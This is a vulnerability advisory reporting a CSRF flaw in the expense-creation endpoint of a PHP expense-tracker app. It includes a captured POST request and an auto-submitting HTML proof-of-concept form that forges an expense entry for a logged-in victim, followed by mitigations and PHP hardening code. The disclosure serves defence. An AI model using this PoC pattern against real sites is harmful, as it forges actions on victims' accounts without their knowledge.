Summary:
A Cross-Site Request Forgery (CSRF) vulnerability exists on the expense creation endpoint (add_expense.php). An authenticated user can be tricked into submitting a forged POST request (for example by visiting a malicious page) that adds an expense on their behalf (e.g., a 3000 entry in the Medicine category). The endpoint issues no CSRF token and does not enforce sufficient Origin/Referer validation of the request.
Steps to Reproduce:
- Log in to the application with a valid user account.
- Capture a legitimate expense creation request (example):
  POST /Personal-Expense-Tracker/add_expense.php HTTP/1.1
  Host: localhost
  Content-Type: application/x-www-form-urlencoded
  Cookie: PHPSESSID=rttnn0mvlple0r5t6pt2efmcf5

  expenseamount=3000&expensedate=2025-11-01&expensecategory=Medicine&add=
- Create a malicious webpage that auto-submits the forged request to the application's endpoint (example PoC below).
- Lure the authenticated victim to visit the malicious page (e.g., via a link or email). When the victim visits the page while logged in to the Personal-Expense-Tracker, the form submits and the application records an expense of 3000 in the "Medicine" category for the specified date.
PoC (HTML):
<!doctype html>
<html>
<body>
<form id="csrf" method="POST" action="http://localhost/Personal-Expense-Tracker/add_expense.php">
<input type="hidden" name="expenseamount" value="3000"/>
<input type="hidden" name="expensedate" value="2025-11-01"/>
<input type="hidden" name="expensecategory" value="Medicine"/>
<input type="hidden" name="add" value=""/>
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
Vendor of the product(s) info
EbeyJoeRegi
Affected product(s)/code base info
Product: Personal-Expense-Tracker
Version: Git commit 0b588ed (local copy tested Nov 1, 2025)
Impact:
An attacker can cause authenticated users to perform unwanted expense-creation actions without their knowledge. Potential impacts include:
- Integrity loss: unauthorized expense records added to victim accounts (financial data corruption).
- Privacy/forensic confusion: falsified entries can obscure real activity.
- Chaining attacks: forged actions might be combined with other flaws to escalate impact (e.g., trigger alerts, manipulate reports).
Affected component(s):
- add_expense.php (expense creation endpoint)
- Any downstream logic that trusts the source of expense creation (reporting, notification, dashboards)
Recommended mitigations:
- CSRF token: Implement per-session (or per-form) unpredictable CSRF tokens and validate them server-side for every state-changing POST endpoint (including add_expense.php). Reject requests without a valid token.
- SameSite cookies: Set session cookies with SameSite=Strict or SameSite=Lax (depending on app requirements) to reduce CSRF risk from cross-site contexts.
- Origin/Referer checks: Enforce strict Origin or Referer header validation for sensitive POST requests (accept only known, same-origin values).
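The following is an added example of how the three mitigations above could be applied to add_expense.php; it is not code from the Personal-Expense-Tracker project. It assumes the app uses PHP sessions for login (as the PHPSESSID cookie in the captured request suggests), keeps the form field names from the advisory, and is served from a single host configured in EXPECTED_HOST (an assumed constant, set here to localhost to match the test setup).

```php
<?php
// Added example (not the project's code): CSRF hardening for add_expense.php.
declare(strict_types=1);

// Assumption: the app is served from exactly this host. Compare Origin/Referer
// against a configured value rather than the Host header, which a client controls.
const EXPECTED_HOST = 'localhost';

// 1) SameSite session cookie, set before session_start(). Lax already blocks the
//    cross-site auto-submitted POST from the PoC; Strict is tighter if the app allows it.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // use false only for plain-HTTP local testing
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// 2) Per-session unpredictable token (32 random bytes, hex encoded).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the submitted token with a constant-time comparison.
function csrf_token_valid(mixed $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// 3) Defence in depth: Origin (or, failing that, Referer) must name our own host.
//    A state-changing POST with neither header present is rejected.
function origin_allowed(array $server, string $allowedHost): bool
{
    $candidate = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if (!is_string($candidate)) {
        return false;
    }
    $host = parse_url($candidate, PHP_URL_HOST); // "null" Origin yields no host -> rejected
    return is_string($host) && strcasecmp($host, $allowedHost) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_token_valid($_POST['csrf_token'] ?? null)
        || !origin_allowed($_SERVER, EXPECTED_HOST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token or origin.');
    }
    // The existing add_expense.php insert logic (login check, validation of
    // expenseamount/expensedate/expensecategory, database write) runs only after this point.
}
?>
<!-- The legitimate form carries the token as a hidden field; the PoC page cannot read it. -->
<form method="POST" action="add_expense.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="number" name="expenseamount" step="0.01" required>
  <input type="date" name="expensedate" required>
  <input type="text" name="expensecategory" required>
  <button type="submit" name="add">Add expense</button>
</form>
```

With this in place, the PoC form from the advisory fails twice over: the browser will not attach a Lax session cookie to a cross-site POST, and even if it did, the request carries no csrf_token and its Origin is the attacker's page rather than EXPECTED_HOST. Any of the three checks alone is enough to close the reported issue; keeping all three is cheap and covers browsers or configurations where one of them does not apply.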
Discovered by:
Team DisclosureX